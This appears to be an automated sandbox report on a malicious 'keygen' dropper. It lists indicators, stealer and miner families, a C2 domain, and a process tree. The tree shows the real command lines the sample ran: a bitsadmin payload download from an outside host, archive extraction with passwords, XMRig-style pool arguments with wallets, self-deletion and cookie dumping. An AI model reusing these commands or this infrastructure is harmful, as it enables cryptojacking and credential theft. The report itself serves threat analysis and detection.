Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1766s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-04-2021 16:03

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2692
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2672
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2596
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2380
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2364
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1852
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1416
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1396
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1204
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1164
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1040
                    • C:\Users\Admin\AppData\Roaming\wvbrriv
                      C:\Users\Admin\AppData\Roaming\wvbrriv
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5732
                      • C:\Users\Admin\AppData\Roaming\wvbrriv
                        C:\Users\Admin\AppData\Roaming\wvbrriv
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3928
                    • C:\Users\Admin\AppData\Roaming\dvbrriv
                      C:\Users\Admin\AppData\Roaming\dvbrriv
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2728
                    • C:\Users\Admin\AppData\Roaming\wvbrriv
                      C:\Users\Admin\AppData\Roaming\wvbrriv
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:6032
                      • C:\Users\Admin\AppData\Roaming\wvbrriv
                        C:\Users\Admin\AppData\Roaming\wvbrriv
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4952
                    • C:\Users\Admin\AppData\Roaming\dvbrriv
                      C:\Users\Admin\AppData\Roaming\dvbrriv
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2200
                    • C:\Users\Admin\AppData\Roaming\wvbrriv
                      C:\Users\Admin\AppData\Roaming\wvbrriv
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5552
                      • C:\Users\Admin\AppData\Roaming\wvbrriv
                        C:\Users\Admin\AppData\Roaming\wvbrriv
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4580
                    • C:\Users\Admin\AppData\Roaming\dvbrriv
                      C:\Users\Admin\AppData\Roaming\dvbrriv
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5780
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1000
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:1828
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2304
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3880
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:216
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2152
                        • C:\Users\Admin\AppData\Local\Temp\is-6HNUP.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-6HNUP.tmp\Install.tmp" /SL5="$601E0,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2972
                          • C:\Users\Admin\AppData\Local\Temp\is-HGS9I.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-HGS9I.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1968
                            • C:\Program Files\MSBuild\ROQQPIEHVC\ultramediaburner.exe
                              "C:\Program Files\MSBuild\ROQQPIEHVC\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3272
                              • C:\Users\Admin\AppData\Local\Temp\is-7JM02.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-7JM02.tmp\ultramediaburner.tmp" /SL5="$501F0,281924,62464,C:\Program Files\MSBuild\ROQQPIEHVC\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:2096
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3224
                            • C:\Users\Admin\AppData\Local\Temp\55-dafe0-3c7-d5ba9-7ff742dde6d44\Denuzhoqaehe.exe
                              "C:\Users\Admin\AppData\Local\Temp\55-dafe0-3c7-d5ba9-7ff742dde6d44\Denuzhoqaehe.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4112
                            • C:\Users\Admin\AppData\Local\Temp\1f-eae32-3a4-fb895-1b48e6f6db48f\Tevaesurama.exe
                              "C:\Users\Admin\AppData\Local\Temp\1f-eae32-3a4-fb895-1b48e6f6db48f\Tevaesurama.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4160
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qssoptg3.sip\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3616
                                • C:\Users\Admin\AppData\Local\Temp\qssoptg3.sip\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\qssoptg3.sip\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3948
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2gxkhs0x.awn\google-game.exe & exit
                                6⤵
                                  PID:4924
                                  • C:\Users\Admin\AppData\Local\Temp\2gxkhs0x.awn\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\2gxkhs0x.awn\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2204
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      PID:5052
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3fxi1kdm.ydx\md1_1eaf.exe & exit
                                  6⤵
                                    PID:5032
                                    • C:\Users\Admin\AppData\Local\Temp\3fxi1kdm.ydx\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\3fxi1kdm.ydx\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5240
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lo4fuopn.2ur\y1.exe & exit
                                    6⤵
                                      PID:5196
                                      • C:\Users\Admin\AppData\Local\Temp\lo4fuopn.2ur\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\lo4fuopn.2ur\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:5488
                                        • C:\Users\Admin\AppData\Local\Temp\TCV3LVFBcO.exe
                                          "C:\Users\Admin\AppData\Local\Temp\TCV3LVFBcO.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5544
                                          • C:\Users\Admin\AppData\Roaming\1619366499240.exe
                                            "C:\Users\Admin\AppData\Roaming\1619366499240.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619366499240.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:5612
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\TCV3LVFBcO.exe"
                                            9⤵
                                              PID:6012
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:2108
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\lo4fuopn.2ur\y1.exe"
                                            8⤵
                                              PID:5756
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                9⤵
                                                • Executes dropped EXE
                                                PID:5952
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:5648
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qdjacnid.2sb\askinstall39.exe & exit
                                          6⤵
                                            PID:5512
                                            • C:\Users\Admin\AppData\Local\Temp\qdjacnid.2sb\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\qdjacnid.2sb\askinstall39.exe
                                              7⤵
                                                PID:5952
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:5076
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:5912
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gbszd1wl.5n2\inst.exe & exit
                                                6⤵
                                                  PID:5816
                                                  • C:\Users\Admin\AppData\Local\Temp\gbszd1wl.5n2\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\gbszd1wl.5n2\inst.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5160
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qierbjym.on1\SunLabsPlayer.exe /S & exit
                                                  6⤵
                                                    PID:5172
                                                    • C:\Users\Admin\AppData\Local\Temp\qierbjym.on1\SunLabsPlayer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\qierbjym.on1\SunLabsPlayer.exe /S
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:6084
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5628
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:6096
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1728
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:2244
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:3888
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5956
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Checks for any installed AV software in registry
                                                                    PID:4104
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    8⤵
                                                                    • Download via BitsAdmin
                                                                    PID:5912
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      9⤵
                                                                        PID:4924
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pEGKUK1c7rfSb681 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:1216
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p6WIfVzfuzp7dzK1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:4692
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4204
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4268
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:1060
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:1800
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5016
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yZAhtmcTmJGk\yZAhtmcTmJGk.dll" yZAhtmcTmJGk
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:3964
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yZAhtmcTmJGk\yZAhtmcTmJGk.dll" yZAhtmcTmJGk
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  PID:5968
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5580
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                  • Drops file in Program Files directory
                                                                                  PID:1520
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5044
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:1728
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoB59C.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5056
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:4176
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50ccu00x.o2a\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:5644
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zam1mrgs.gnp\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:6140
                                                                                        • C:\Users\Admin\AppData\Local\Temp\zam1mrgs.gnp\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\zam1mrgs.gnp\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5616
                                                                                          • C:\Users\Admin\AppData\Local\Temp\zam1mrgs.gnp\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\zam1mrgs.gnp\toolspab1.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:6100
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r52pirrw.p4y\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:5840
                                                                                          • C:\Users\Admin\AppData\Local\Temp\r52pirrw.p4y\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\r52pirrw.p4y\c7ae36fa.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            PID:6080
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k3q1zic3.ug4\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:6000
                                                                                            • C:\Users\Admin\AppData\Local\Temp\k3q1zic3.ug4\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\k3q1zic3.ug4\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5664
                                                                                              • C:\Users\Admin\AppData\Local\Temp\k3q1zic3.ug4\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\k3q1zic3.ug4\app.exe" /8-2222
                                                                                                8⤵
                                                                                                  PID:1676
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4268
                                                                                      • C:\Users\Admin\AppData\Roaming\78DF.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\78DF.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4852
                                                                                        • C:\Users\Admin\AppData\Roaming\78DF.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\78DF.tmp.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          PID:4320
                                                                                      • C:\Users\Admin\AppData\Roaming\7B51.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\7B51.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4956
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w4133@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:792
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w32590 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:4896
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                            PID:1788
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1
                                                                                              4⤵
                                                                                              • Runs ping.exe
                                                                                              PID:216
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          PID:5212
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          PID:5972
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5644
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
